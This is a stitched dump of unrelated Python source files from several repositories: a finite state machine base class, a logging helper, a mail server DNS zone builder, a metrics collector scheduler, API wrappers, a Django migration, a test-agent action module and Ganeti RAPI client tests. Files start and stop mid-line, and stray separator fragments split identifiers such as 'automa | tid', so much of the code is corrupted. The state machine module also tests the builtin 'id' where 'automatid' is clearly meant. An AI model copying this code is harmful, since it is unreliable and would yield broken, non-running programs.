This is a programming paradigm in which the program or its part is thought of as a model of a
`finite state machine <http://en.wikipedia.org/wiki/Finite_state_machine>`_ or any other formal automaton.
Its defining characteristic is the use of finite state machines to
`describe program behavior <http://en.wikipedia.org/wiki/State_diagram>`_.
The transition graphs of state machines are used in all stages of software development:
- specification,
- implementation,
- debugging and
- documentation.
A small tool called `visio2python <https://github.com/vesellov/visio2python/>`_
was written by Veselin Penev to simplify working with the visualized state machines.
It can translate transition graphs created in Microsoft Visio into Python code.
Automata-Based Programming technology was introduced by Anatoly Shalyto in 1991 and Switch-technology was
developed to support automata-based programming.
Automata-Based Programming is considered to be rather general purpose program development methodology
than just another one finite state machine implementation.
Anatoly Shalyto is the former of
`Foundation for Open Project Documentation <http://en.wikipedia.org/wiki/Foundation_for_Open_Project_Documentation>`_.
Read more about Switch-technology on the Saint-Petersburg National Research University
of Information Technologies, Mechanics and Optics, Programming Technologies Department
`Page <http://is.ifmo.ru/english>`_.
"""
#------------------------------------------------------------------------------
import logging
import sys
import time
import traceback
#------------------------------------------------------------------------------
logger = logging.getLogger(__name__)
#------------------------------------------------------------------------------
_Debug = True # set to False to turn off any logging
_LogEvents = True # set to True to log every event passed to any state machine
#------------------------------------------------------------------------------
_Counter = 0 #: Increment by one for every new object, the idea is to keep unique ID's in the index
_Index = {} #: Index dictionary, unique id (string) to index (int)
_Objects = {} #: Objects dictionary to store all state machines objects
_StateChangedCallback = None #: Called when some state were changed
_LogFile = None #: This is to have a separated Log file for state machines logs
_LogFilename = None
_LogsCount = 0 #: If not zero - it will print time since that value, not system time
_LifeBeginsTime = 0
#------------------------------------------------------------------------------
def get_new_index():
"""
Just get the current index and increase by one
"""
global _Counter
_Counter += 1
return _Counter
def create_index(name):
"""
Generate unique ID, and put it into Index dict, increment counter
"""
global _Index
automatid = name
if id in _Index:
i = 1
while _Index.get(automatid + '(' + str(i) + ')'):
i += 1
automatid = name + '(' + str(i) + ')'
_Index[automatid] = get_new_index()
return automatid, _Index[automatid]
def set_object(index, obj):
"""
Put object for that index into memory
"""
global _Objects
_Objects[index] = obj
def clear_object(index):
"""
Clear object with given index from memory
"""
global _Objects
if _Objects is None:
return
if index in _Objects:
del _Objects[index]
def objects():
"""
Get all state machines stored in memory
"""
global _Objects
return _Objects
#------------------------------------------------------------------------------
def SetStateChangedCallback(cb):
"""
Set callback to be fired when any state machine globally changes its state
Callback parameters are::
cb(index, id, name, old_state, new_state)
"""
global _StateChangedCallback
_StateChangedCallback = cb
def OpenLogFile(filename):
"""
Open a file to write logs from all state machines. Very useful during debug.
"""
global _LogFile
global _LogFilename
if _LogFile:
return
_LogFilename = filename
try:
_LogFile = open(_LogFilename, 'w')
except:
_LogFile = None
def CloseLogFile():
"""
Close the current log file, you can than open it again.
"""
global _LogFile
if not _LogFile:
return
_LogFile.flush()
_LogFile.close()
_LogFile = None
_LogFilename = None
def LifeBegins(when=None):
"""
Call that function during program start up to print relative time in the logs, not absolute.
"""
global _LifeBeginsTime
if when:
_LifeBeginsTime = when
else:
_LifeBeginsTime = time.time()
#------------------------------------------------------------------------------
class Automat(object):
"""
Base class of the State Machine Object.
You need to subclass this class and override the method ``A(event, arg)``.
Constructor needs the ``name`` of the state machine and the beginning ``state``.
At first it generate an unique ``id`` and new ``index`` value.
You can use ``init()`` method in the subclass to call some code at start.
Finally put the new object into the memory with given index -
it is placed into ``objects()`` dictionary.
To remove the instance call ``destroy()`` method.
"""
state = 'NOT_EXIST'
"""
This is a string representing current Machine state, must be set in the constructor.
``NOT_EXIST`` indicates that this machine is not created yet.
A blank state is a fundamental mistake!
"""
post = False
"""
Sometimes need to set the new state AFTER finish all actions.
Set ``post = True`` to call ``self.state = <newstate>``
in the ``self.event()`` method, not in the ``self.A()`` method.
You also must set that flag in the MS Visio document and rebuild the code:
put ``[post]`` string into the last line of the LABEL shape.
"""
def __init__(self, name, state, debug_level=18, log_events=False, log_transitions=False, **kwargs):
self.id, self.index = create_index(name)
self.name = name
self.state = state
self.debug_level = debug_level
self.log_events = log_events
self.log_transitions = log_transitions
self.init(**kwargs)
set_object(self.index, self)
self.log(self.debug_level, 'CREATED AUTOMAT %s with index %d' % (str(self), self.index))
def __del__(self):
global _Index
global _StateChangedCallback
if self is None:
return
o = self
last_state = self.state
automa | tid = self.id
name = self.name
debug_level = self.debug_level
if _Index is None:
self.log(debug_level, 'automat.__del__ WARNING Index is None: %r %r' % (automatid, name))
return
| index = _Index.get(automatid, None)
if index is None:
self.log(debug_level, 'automat.__del__ WARNING %s not found' % automatid)
return
del _Index[automatid]
self.log(debug_level, 'DESTROYED AUTOMAT %s with index %d' % (str(o), index))
del o
if _StateChangedCallback is not None:
_StateChangedCallback(index, automatid, name, last_state, 'NOT_EXIST')
def __str__(self):
"""
Will print something like: "network_connector(CONNECTED)"
"""
return '%s(%s)' % (self.id, self.state)
def init(self, **kwargs):
"""
Define |
ktdreyer/rdopkg | rdopkg/utils/log.py | Python | apache-2.0 | 1,968 | 0 | import logging
import terminal
INFO = logging.INFO
# between info and debug
VERBOSE = (logging.INFO + logging.DEBUG) / 2
DEBUG = logging.DEBUG
log = logging.getLogger('rdopkg')
log.setLevel(logging.INFO)
if len(log.handlers) < 1:
formatter = logging.Formatter(fmt='%(message)s')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
log.addHandler(handler)
class LogTerminal(terminal.Terminal):
@property
def warn(self):
return self | .yellow
@property
def important(self):
return self.yellow_bold
@property
def error(self):
return self.red
@property
def good(self):
return self.green
@property
def cmd(self):
return sel | f.cyan
term = LogTerminal()
def set_colors(colors):
global term
if colors == 'yes':
if not terminal.COLOR_TERMINAL:
return False
term = LogTerminal(force_styling=True)
return True
elif colors == 'no':
if not terminal.COLOR_TERMINAL:
return True
term = LogTerminal(force_styling=None)
return True
elif colors == 'auto':
term = LogTerminal()
return True
return False
def error(*args, **kwargs):
if args:
largs = list(args)
largs[0] = term.error(args[0])
args = tuple(largs)
log.error(*args, **kwargs)
def warn(*args, **kwargs):
if args:
largs = list(args)
largs[0] = term.warn(args[0])
args = tuple(largs)
log.warning(*args, **kwargs)
def success(*args, **kwargs):
if args:
largs = list(args)
largs[0] = term.good(args[0])
args = tuple(largs)
log.info(*args, **kwargs)
def info(*args, **kwargs):
log.info(*args, **kwargs)
def verbose(*args, **kwargs):
log.log(VERBOSE, *args, **kwargs)
def debug(*args, **kwargs):
log.debug(*args, **kwargs)
def command(*args, **kwargs):
log.info(*args, **kwargs)
|
realizelol/xenmailserv | management/dns_update.py | Python | gpl-3.0 | 37,781 | 0.024139 | #!/usr/bin/python3
# Creates DNS zone files for all of the domains of all of the mail users
# and mail aliases and restarts nsd.
########################################################################
import sys, os, os.path, urllib.parse, datetime, re, hashlib, base64
import ipaddress
import rtyaml
import dns.resolver
from mailconfig import get_mail_domains
from utils import shell, load_env_vars_from_file, safe_domain_name, sort_domains
def get_dns_domains(env):
# Add all domain names in use by email users and mail aliases and ensure
# PRIMARY_HOSTNAME is in the list.
domains = set()
domains |= get_mail_domains(env)
domains.add(env['PRIMARY_HOSTNAME'])
return domains
def get_dns_zones(env):
# What domains should we create DNS zones for? Never create a zone for
# a domain & a subdomain of that domain.
domains = get_dns_domains(env)
# Exclude domains that are subdomains of other domains we know. Proceed
# by looking at shorter domains first.
zone_domains = set()
for domain in sorted(domains, key=lambda d : len(d)):
for d in zone_domains:
if domain.endswith("." + d):
# We found a parent domain already in the list.
break
else:
# 'break' did not occur: there is no parent domain.
zone_domains.add(domain)
# Make a nice and safe filename for each domain.
zonefiles = []
for domain in zone_domains:
zonefiles.append([domain, safe_domain_name(domain) + ".txt"])
# Sort the list so that the order is nice and so that nsd.conf has a
# stable order so we don't rewrite the file & restart the service
# meaninglessly.
zone_order = sort_domains([ zone[0] for zone in zonefiles ], env)
zonefiles.sort(key = lambda zone : zone_order.index(zone[0]) )
return zonefiles
def do_dns_update(env, force=False):
# Write zone files.
os.makedirs('/etc/nsd/zones', exist_ok=True)
zonefiles = []
updated_domains = []
for (domain, zonefile, records) in build_zones(env):
# The final set of files will be signed.
zonefiles.append((domain, zonefile + ".signed"))
# See if the zone has changed, and if so update the serial number
# and write the zone file.
if not write_nsd_zone(domain, "/etc/nsd/zones/" + zonefile, records, env, force):
# Zone was not updated. There were no changes.
continue
# Mark that we just updated this domain.
updated_domains.append(domain)
# Sign the zone.
#
# Every time we sign the zone we get a new result, which means
# we can't sign a zone without bumping the zone's serial number.
# Thus we only sign a zone if write_nsd_zone returned True
# indicating the zone changed, and thus it got a new serial number.
# write_nsd_zone is smart enough to check if a zone's signature
# is nearing expiration and if so it'll bump the serial number
# and return True so we get a chance to re-sign it.
sign_zone(domain, zonefile, env)
# Write the main nsd.conf file.
if write_nsd_conf(zonefiles, list(get_custom_dns_config(env)), env):
# Make sure updated_domains contains *something* if we wrote an updated
# nsd.conf so that we know to restart nsd.
if len(updated_domains) == 0:
updated_domains.append("DNS configuration")
# Kick nsd if anything changed.
if len(updated_domains) > 0:
shell('check_call', ["/usr/sbin/service", "nsd", "restart"])
# Write the OpenDKIM configuration tables for all of the domains.
if write_opendkim_tables(get_mail_domains(env), env):
# Settings changed. Kick opendkim.
shell('check_call', ["/usr/sbin/service", "opendkim", "restart"])
if len(updated_domains) == 0:
# If this is the only thing that changed?
updated_domains.append("OpenDKIM configuration")
# Clear bind9's DNS cache so our own DNS resolver is up to date.
# (ignore errors with trap=True)
shell('check_call', ["/usr/sbin/rndc", "flush"], trap=True)
if len(updated_domains) == 0:
# if nothing was updated (except maybe OpenDKIM's files), don't sh | ow any output
return ""
else:
return "updated DNS: " + ",".join(updated_domains) + "\n"
########################################################################
def build | _zones(env):
# What domains (and their zone filenames) should we build?
domains = get_dns_domains(env)
zonefiles = get_dns_zones(env)
# Custom records to add to zones.
additional_records = list(get_custom_dns_config(env))
from web_update import get_web_domains
www_redirect_domains = set(get_web_domains(env)) - set(get_web_domains(env, include_www_redirects=False))
# Build DNS records for each zone.
for domain, zonefile in zonefiles:
# Build the records to put in the zone.
records = build_zone(domain, domains, additional_records, www_redirect_domains, env)
yield (domain, zonefile, records)
def build_zone(domain, all_domains, additional_records, www_redirect_domains, env, is_zone=True):
records = []
# For top-level zones, define the authoritative name servers.
#
# Normally we are our own nameservers. Some TLDs require two distinct IP addresses,
# so we allow the user to override the second nameserver definition so that
# secondary DNS can be set up elsewhere.
#
# 'False' in the tuple indicates these records would not be used if the zone
# is managed outside of the box.
if is_zone:
# Obligatory definition of ns1.PRIMARY_HOSTNAME.
records.append((None, "NS", "ns1.%s." % env["PRIMARY_HOSTNAME"], False))
# Define ns2.PRIMARY_HOSTNAME or whatever the user overrides.
# User may provide one or more additional nameservers
secondary_ns_list = get_secondary_dns(additional_records, mode="NS") \
or ["ns2." + env["PRIMARY_HOSTNAME"]]
for secondary_ns in secondary_ns_list:
records.append((None, "NS", secondary_ns+'.', False))
# In PRIMARY_HOSTNAME...
if domain == env["PRIMARY_HOSTNAME"]:
# Define ns1 and ns2.
# 'False' in the tuple indicates these records would not be used if the zone
# is managed outside of the box.
records.append(("ns1", "A", env["PUBLIC_IP"], False))
records.append(("ns2", "A", env["PUBLIC_IP"], False))
if env.get('PUBLIC_IPV6'):
records.append(("ns1", "AAAA", env["PUBLIC_IPV6"], False))
records.append(("ns2", "AAAA", env["PUBLIC_IPV6"], False))
# Set the A/AAAA records. Do this early for the PRIMARY_HOSTNAME so that the user cannot override them
# and we can provide different explanatory text.
records.append((None, "A", env["PUBLIC_IP"], "Required. Sets the IP address of the box."))
if env.get("PUBLIC_IPV6"): records.append((None, "AAAA", env["PUBLIC_IPV6"], "Required. Sets the IPv6 address of the box."))
# Add a DANE TLSA record for SMTP.
records.append(("_25._tcp", "TLSA", build_tlsa_record(env), "Recommended when DNSSEC is enabled. Advertises to mail servers connecting to the box that mandatory encryption should be used."))
# Add a DANE TLSA record for HTTPS, which some browser extensions might make use of.
records.append(("_443._tcp", "TLSA", build_tlsa_record(env), "Optional. When DNSSEC is enabled, provides out-of-band HTTPS certificate validation for a few web clients that support it."))
# Add a SSHFP records to help SSH key validation. One per available SSH key on this system.
for value in build_sshfp_records():
records.append((None, "SSHFP", value, "Optional. Provides an out-of-band method for verifying an SSH key before connecting. Use 'VerifyHostKeyDNS yes' (or 'VerifyHostKeyDNS ask') when connecting with ssh."))
# Add DNS records for any subdomains of this domain. We should not have a zone for
# both a domain and one of its subdomains.
subdomains = [d for d in all_domains if d.endswith("." + domain)]
for subdomain in subdomains:
subdomain_qname = subdomain[0:-len("." + domain)]
subzone = build_zone(subdomain, [], additional_records, www_redirect_domains, env, is_zone=False)
for child_qname, child_rtype, child_value, child_explanation in subzone:
if child_qname == None:
child_qname = subdomain_qname
else:
child_qname += "." + subdomain_qname
records.append((child_qname, child_rtype, child_value, child_explanation))
has_rec_base = list(records) # clone current state
def has_rec(qname, rtype, prefix=None):
for rec in has_rec_base:
if rec[0] == qname and rec[1] == rtype and (prefix is No |
jriguera/Diamond | src/diamond/utils/scheduler.py | Python | mit | 3,514 | 0 | # coding=utf-8
import time
import math
import multiprocessing
import os
import random
import sys
import signal
try:
from setproctitle import getproctitle, setproctitle
except ImportError:
setproctitle = None
from diamond.utils.signals import signal_to_exception
from diamond.utils.signals import SIGALRMException
from diamond.utils.signals import SIGHUPException
def collector_process(collector, metric_queue, log):
"""
"""
proc = multiprocessing.current_process()
if setproctitle:
setproctitle('%s - %s' % (getproctitle(), proc.name))
signal.signal(signal.SIGALRM, signal_to_exception)
signal.signal(signal.SIGHUP, signal_to_exception)
signal.signal(signal.SIGUSR2, signal_to_exception)
interval = float(collector.config['interval'])
log.debug('Starting')
log.debug('Interval: %s seconds', interval)
# Validate the interval
if interval <= 0:
log.critical('interval of %s is not valid!', interval)
sys.exit(1)
# Start the next execution at the next window plus some stagger delay to
# avoid having all collectors running at the same time
next_window = math.floor(time.time() / interval) * interval
stagger_offset = random.uniform(0, interval - 1)
# Allocate time till the end of the window for the collector to run. With a
# minimum of 1 second
max_time = int(max(interval - stagger_offset, 1))
log.debug('Max collection time: %s seconds', max_time)
# Setup stderr/stdout as /dev/null so random print statements in thrid
# party libs do not fail and prevent collectors from running.
# https://github.com/BrightcoveOS/Diamond/issues/722
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
while(True):
try:
| time_to_sleep = (next_window + stagger_offset) - time.time()
if time_to_sleep > 0:
time.sleep(time_to_sle | ep)
next_window += interval
# Ensure collector run times fit into the collection window
signal.alarm(max_time)
# Collect!
collector._run()
# Success! Disable the alarm
signal.alarm(0)
except SIGALRMException:
log.error('Took too long to run! Killed!')
# Adjust the stagger_offset to allow for more time to run the
# collector
stagger_offset = stagger_offset * 0.9
max_time = int(max(interval - stagger_offset, 1))
log.debug('Max collection time: %s seconds', max_time)
except SIGHUPException:
# Reload the config if requested
# We must first disable the alarm as we don't want it to interrupt
# us and end up with half a loaded config
signal.alarm(0)
log.info('Reloading config reload due to HUP')
collector.load_config()
log.info('Config reloaded')
except Exception:
log.exception('Collector failed!')
break
def handler_process(handlers, metric_queue, log):
proc = multiprocessing.current_process()
if setproctitle:
setproctitle('%s - %s' % (getproctitle(), proc.name))
log.debug('Starting process %s', proc.name)
while(True):
metrics = metric_queue.get(block=True, timeout=None)
for metric in metrics:
for handler in handlers:
handler._process(metric)
for handler in handlers:
handler._flush()
|
danriti/python-traceview | traceview/host.py | Python | mit | 688 | 0 | # -*- coding: utf-8 -*-
"""
traceview.hosts
This module contains the objects associated with Hosts API resources.
http://dev.appneta.com/docs/api-v2/hosts.html
"""
from .resource import Resource
class Host(Resource):
def get(self, app=None):
if app:
path = 'app/{app}/hosts'.forma | t(app=app)
else:
path = 'hosts'
return self.api.get(path)
def delete(self, host_id):
path = 'hosts/{host_id}'.format(host_id=host_id)
return self.api.delete(path)
class Instrumentation(Resource):
def get(self, host_id):
path = 'hosts/{host_id}/versions'.format(host_id=host_id)
re | turn self.api.get(path)
|
qedsoftware/commcare-hq | corehq/sql_accessors/migrations/0035_add_undelete_functions.py | Python | bsd-3-clause | 612 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from corehq.sql_db.operations import RawSQLMigration
from corehq.form_processor.models import XFormInstanceSQL
migrator = RawSQLMigration(('corehq', 'sql_accessors', 'sql_templates'), {
'FORM_STATE_DELETED': XFormInstanceSQL.DELETED
})
class Mi | gration(migrations.Migration):
dependencies = [
('sql_accessors', '0034_update_reindex_functions'),
]
operations = [
migrator.get_migration('soft_undelete_cases.sql'),
migrator.get_migration( | 'soft_undelete_forms.sql'),
]
|
maliubiao/python_netlink | setup.py | Python | mit | 277 | 0.057762 | #! /usr/bin/env python
from distutils.c | ore import setup, Extension
m = Extension('netdev',
sources = ['netdev.c']
| )
setup(name = 'netdev',
version = '1.0',
description = 'python native library for network device',
ext_modules = [m])
|
deepeshmittal/daytona | Scheduler+Agent/action.py | Python | apache-2.0 | 25,730 | 0.008511 | # This file implements all actions performed by agent to start execution script on exec host and sar data collection
# from all exec and stat hosts. Each procedure is mapped with particular daytona command used by scheduler to
# communicate with agent. Upon recieving command from daytona scheduler, agent execute below procedure
# which is mapped with that particular daytona command
#!/usr/bin/env python
import subprocess
import threading
import common
import os
import time
import shutil
from shutil import copyfile
import sys
import testobj
import client
import config
import signal
import envelope
import system_metrics_gather
from logger import LOG
lctx = None
cfg = config.CFG("DaytonaHost", lctx)
cfg.readCFG("config.ini")
EXEC_SCRIPT_DIR = cfg.execscript_location
# Agent on a particular host maintains a list of tests it is currently executing and it also keep updating test data.
# It's a key-value pair map in which each class object is associated with test ID
running_tests = {}
action_lock = threading.Lock()
exec_script_pid = {}
exec_script_lock = threading.Lock()
class activeTest:
"""
This class defines a test object which capture all the information of the test. Agent save these test objects
in a queue to maintain information of all running tests.
"""
def __init__(self, testid, actionID, exec_thread, testobj):
self.testid = testid
self.actionID = actionID
self.exec_thread = exec_thread
self.tobj = testobj
self.stream = None
self.status = ""
self.serverip = ""
self.stathostip = ""
self.serverport = 0
self.stathostport = 0
self.execdir = ""
self.logdir = ""
self.resultsdir = ""
self.statsdir = ""
self.archivedir = ""
self.execscriptfile = ""
self.hostname = ""
def clear(self):
lctx.info("Clearing object contents")
self.cleanup()
def cleanup(self):
lctx.info("Clearing FS, processes")
class commandThread(threading.Thread):
"""
This class creates child thread for starting execution script or executing any other linux based command to get
output from the system
"""
def __init__(self, cmdstr, dcmdstr, streamfile, cdir, testid):
self.cmd = cmdstr
self.dcmd = dcmdstr
self.sfile = streamfile
self.cwd = cdir
self.paused = False
self._stop = threading.Event()
self.stdout = None
self.stderr = None
self.testid = testid
threading.Thread.__init__(self)
def resume(self):
with self.state:
self.paused = False
self.state.notify() # unblock self if waiting
def pause(self):
with self.state:
self.paused = True # make self block and wait
def check(self):
with self.state:
if self.paused:
self.state.wait() # block until notified
if self._stop.isSet():
return False
def stop(self):
self._stop.set()
def __del__(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
def run(self):
lctx.debug(self.cmd)
ca = self.cmd.split(" ")
lctx.debug(ca)
# os.setsid is used for creating a new pid group for this exec script excuting so that any subsequent
# child thread or another script invocation will remain in same PID group. In the event of timer expire or if
# something goes wrong, we will just kill this PID group to kill everything.
p = subprocess.Popen(ca, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=self.cwd,
preexec_fn=os.setsid)
# Saving PID information for keeping track of PID group
exec_script_lock.acquire()
exec_script_pid[self.testid] = p
exec_script_lock.release()
while True:
out = p.stdout.read(1)
if out == '' and p.poll() is not None:
break
if out != '':
sys.stdout.write(out)
sys.stdout.flush()
if self.sfile is not None:
self.sfile.flush()
self.sfile.flush()
def get_test(testid):
"""
This command get the test object from the running queue of agent. It accquire lock on the queue to avoid mutual
exclusion situtation. Mutilple threads might be excuting actions for a particular test
:param testid: It takes test ID as argument to fetch the test object
:return: test object if found in the queue
"""
found = False
current_test = None
action_lock.acquire()
if testid in running_tests:
current_test = running_tests[testid]
found = True
action_lock.release()
if found:
return current_test
else:
return
def save_test(testid, test):
"""
This procedure is called to update test information in agent queue.
:param testid: Test ID is a key in running test queue
:param test: Updated test object which need to be saved in running queue
:return: true if update is successfull
"""
found = False
action_lock.acquire()
if testid in running_tests:
running_tests[testid] = test
found = True
action_lock.release()
return found
def delete_test(testid):
"""
This procedure delete the test information from the running queue. This will happen if test execution ends or
something goes wrong with the test
:param testid: Test ID to identify test in running queue
:return: NA
"""
action_lock.acquire()
if testid in running_tests:
del running_tests[testid]
action_lock.release()
def exec_cmd(cmd, daytona_cmd, sync, obj, actionid, current_test):
"""
This procedure does the setup for starting execution script. It creates object of child process which execute
startup script
"""
lctx.debug("Execute cmd : " + cmd)
sfile = None
cl = None
########
if daytona_cmd == "DAYTONA_START_TEST":
cl = client.TCPClient(LOG.getLogger("clientlog", "Agent"))
(current_test.stream, sfile) = cl.stream_start(current_test.serverip, current_test.serverport,
str(current_test.tobj.testobj.TestInputData.exec_log_path))
########
if sfile is not None:
sfile.flush()
cthread = commandThread(cmd, daytona_cmd, sfile, current_test.execdir, current_test.testid)
current_test.exec_thread = cthread
cthread.start()
| (t, aid, tst, ts) = (None, None, None, None)
if sync == "T":
lctx.debug("Execute cmd in Sync ctx")
cthread.join()
if sfile is not None:
sfile.flush()
else:
# async action entry in the server table (need this to che | ck self alive below)
for tp in obj.async_actions:
if tp[1] == actionid:
(t, aid, tst, ts) = tp
lctx.debug("Execute cmd in asSync ctx : " + str(actionid))
timer_expire = False
while True:
lctx.debug("waiting for async action to complete : " + str(actionid))
if cthread.stdout is not None:
lctx.debug("printting output of stream ")
if sfile is not None:
sfile.flush()
if tst.testobj.TestInputData.timeout > 0:
if time.time() - ts > tst.testobj.TestInputData.timeout:
lctx.error("Timer expired for this test, need to end this async action")
timer_expire = True
# Exit from this while loop if timer expires or execution script ends
if t.check() == False or cthread.is_alive() == False or timer_expire:
if daytona_cmd == "DAYTONA_START_TEST":
if cthread.is_alive():
exec_script_lock.acquire()
if current_test.testid in exec_script_pid:
p = exec_script_pid[current_test.testid]
del exec_script_pid[current_test.testid]
exec_script_lock.releas |
yiannist/ganeti | test/py/ganeti.rapi.client_unittest.py | Python | bsd-2-clause | 64,077 | 0.004573 | #!/usr/bin/python
#
# Copyright (C) 2010, 2011 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for unittesting the RAPI client module"""
import unittest
import warnings
import pycurl
from ganeti import opcodes
from ganeti import constants
from ganeti import http
from ganeti import serializer
from ganeti import utils
from ganeti import query
from ganeti import objects
from ganeti import rapi
from ganeti import errors
import ganeti.rapi.testutils
from ganeti.rapi import connector
from ganeti.rapi import rlib2
from ganeti.rapi import client
import testutils
# List of resource handlers which aren't used by the RAPI client
_KNOWN_UNUSED = set([
rlib2.R_root,
rlib2.R_2,
])
# Global variable for collecting used handlers
_used_handlers = None
class RapiMock(object):
def __init__(self):
self._mapper = connector.Mapper()
self._responses = []
self._last_handler = None
self._last_req_data = None
def ResetResponses(self):
del self._responses[:]
def AddResponse(self, response, code=200):
self._responses.insert(0, (code, response))
def CountPending(self):
return len(self._responses)
def GetLastHandler(self):
return self._last_handler
def GetLastRequestData(self):
return self._last_req_data
def FetchResponse(self, path, method, headers, request_body):
self._last_req_data = request_body
try:
(handler_cls, items, args) = self._mapper.getController(path)
# Record handler as used
| _used_handlers.add(handler_cls)
self._last_handler = handler_cls(items, args, None)
if not hasattr(self._last_handler, method.upper()):
raise http.HttpNotImplemented(message="Method not implemented")
except http.HttpException, ex:
code = ex.code
respo | nse = ex.message
else:
if not self._responses:
raise Exception("No responses")
(code, response) = self._responses.pop()
return (code, NotImplemented, response)
class TestConstants(unittest.TestCase):
def test(self):
self.assertEqual(client.GANETI_RAPI_PORT, constants.DEFAULT_RAPI_PORT)
self.assertEqual(client.GANETI_RAPI_VERSION, constants.RAPI_VERSION)
self.assertEqual(client.HTTP_APP_JSON, http.HTTP_APP_JSON)
self.assertEqual(client._REQ_DATA_VERSION_FIELD, rlib2._REQ_DATA_VERSION)
self.assertEqual(client.JOB_STATUS_QUEUED, constants.JOB_STATUS_QUEUED)
self.assertEqual(client.JOB_STATUS_WAITING, constants.JOB_STATUS_WAITING)
self.assertEqual(client.JOB_STATUS_CANCELING,
constants.JOB_STATUS_CANCELING)
self.assertEqual(client.JOB_STATUS_RUNNING, constants.JOB_STATUS_RUNNING)
self.assertEqual(client.JOB_STATUS_CANCELED, constants.JOB_STATUS_CANCELED)
self.assertEqual(client.JOB_STATUS_SUCCESS, constants.JOB_STATUS_SUCCESS)
self.assertEqual(client.JOB_STATUS_ERROR, constants.JOB_STATUS_ERROR)
self.assertEqual(client.JOB_STATUS_PENDING, constants.JOBS_PENDING)
self.assertEqual(client.JOB_STATUS_FINALIZED, constants.JOBS_FINALIZED)
self.assertEqual(client.JOB_STATUS_ALL, constants.JOB_STATUS_ALL)
# Node evacuation
self.assertEqual(client.NODE_EVAC_PRI, constants.NODE_EVAC_PRI)
self.assertEqual(client.NODE_EVAC_SEC, constants.NODE_EVAC_SEC)
self.assertEqual(client.NODE_EVAC_ALL, constants.NODE_EVAC_ALL)
# Legacy name
self.assertEqual(client.JOB_STATUS_WAITLOCK, constants.JOB_STATUS_WAITING)
# RAPI feature strings
self.assertEqual(client._INST_CREATE_REQV1, rlib2._INST_CREATE_REQV1)
self.assertEqual(client.INST_CREATE_REQV1, rlib2._INST_CREATE_REQV1)
self.assertEqual(client._INST_REINSTALL_REQV1, rlib2._INST_REINSTALL_REQV1)
self.assertEqual(client.INST_REINSTALL_REQV1, rlib2._INST_REINSTALL_REQV1)
self.assertEqual(client._NODE_MIGRATE_REQV1, rlib2._NODE_MIGRATE_REQV1)
self.assertEqual(client.NODE_MIGRATE_REQV1, rlib2._NODE_MIGRATE_REQV1)
self.assertEqual(client._NODE_EVAC_RES1, rlib2._NODE_EVAC_RES1)
self.assertEqual(client.NODE_EVAC_RES1, rlib2._NODE_EVAC_RES1)
# Error codes
self.assertEqual(client.ECODE_RESOLVER, errors.ECODE_RESOLVER)
self.assertEqual(client.ECODE_NORES, errors.ECODE_NORES)
self.assertEqual(client.ECODE_TEMP_NORES, errors.ECODE_TEMP_NORES)
self.assertEqual(client.ECODE_INVAL, errors.ECODE_INVAL)
self.assertEqual(client.ECODE_STATE, errors.ECODE_STATE)
self.assertEqual(client.ECODE_NOENT, errors.ECODE_NOENT)
self.assertEqual(client.ECODE_EXISTS, errors.ECODE_EXISTS)
self.assertEqual(client.ECODE_NOTUNIQUE, errors.ECODE_NOTUNIQUE)
self.assertEqual(client.ECODE_FAULT, errors.ECODE_FAULT)
self.assertEqual(client.ECODE_ENVIRON, errors.ECODE_ENVIRON)
def testErrors(self):
self.assertEqual(client.ECODE_ALL, errors.ECODE_ALL)
# Make sure all error codes are in both RAPI client and errors module
for name in filter(lambda s: (s.startswith("ECODE_") and s != "ECODE_ALL"),
dir(client)):
value = getattr(client, name)
self.assertEqual(value, getattr(errors, name))
self.assertTrue(value in client.ECODE_ALL)
self.assertTrue(value in errors.ECODE_ALL)
class RapiMockTest(unittest.TestCase):
def test404(self):
(code, _, body) = RapiMock().FetchResponse("/foo", "GET", None, None)
self.assertEqual(code, 404)
self.assertTrue(body is None)
def test501(self):
(code, _, body) = RapiMock().FetchResponse("/version", "POST", None, None)
self.assertEqual(code, 501)
self.assertEqual(body, "Method not implemented")
def test200(self):
rapi = RapiMock()
rapi.AddResponse("2")
(code, _, response) = rapi.FetchResponse("/version", "GET", None, None)
self.assertEqual(200, code)
self.assertEqual("2", response)
self.failUnless(isinstance(rapi.GetLastHandler(), rlib2.R_version))
def _FakeNoSslPycurlVersion():
# Note: incomplete version tuple
return (3, "7.16.0", 462848, "mysystem", 1581, None, 0)
def _FakeFancySslPycurlVersion():
# Note: incomplete version tuple
return (3, "7.16.0", 462848, "mysystem", 1581, "FancySSL/1.2.3", 0)
def _FakeOpenSslPycurlVersion():
# Note: incomplete version tuple
return (2, "7.15.5", 462597, "othersystem", 668, "OpenSSL/0.9.8c", 0)
def _FakeGnuTlsPycurlVersion():
# Note: incomplete version tuple
return (3, "7.18.0", 463360, "somesystem", 1581, "GnuTLS/2.0.4", 0)
class TestExtendedConfig(unittest.TestCase):
def testAuth(self):
cl = client.GanetiRapiClient("master.example.com",
username="user", password="pw",
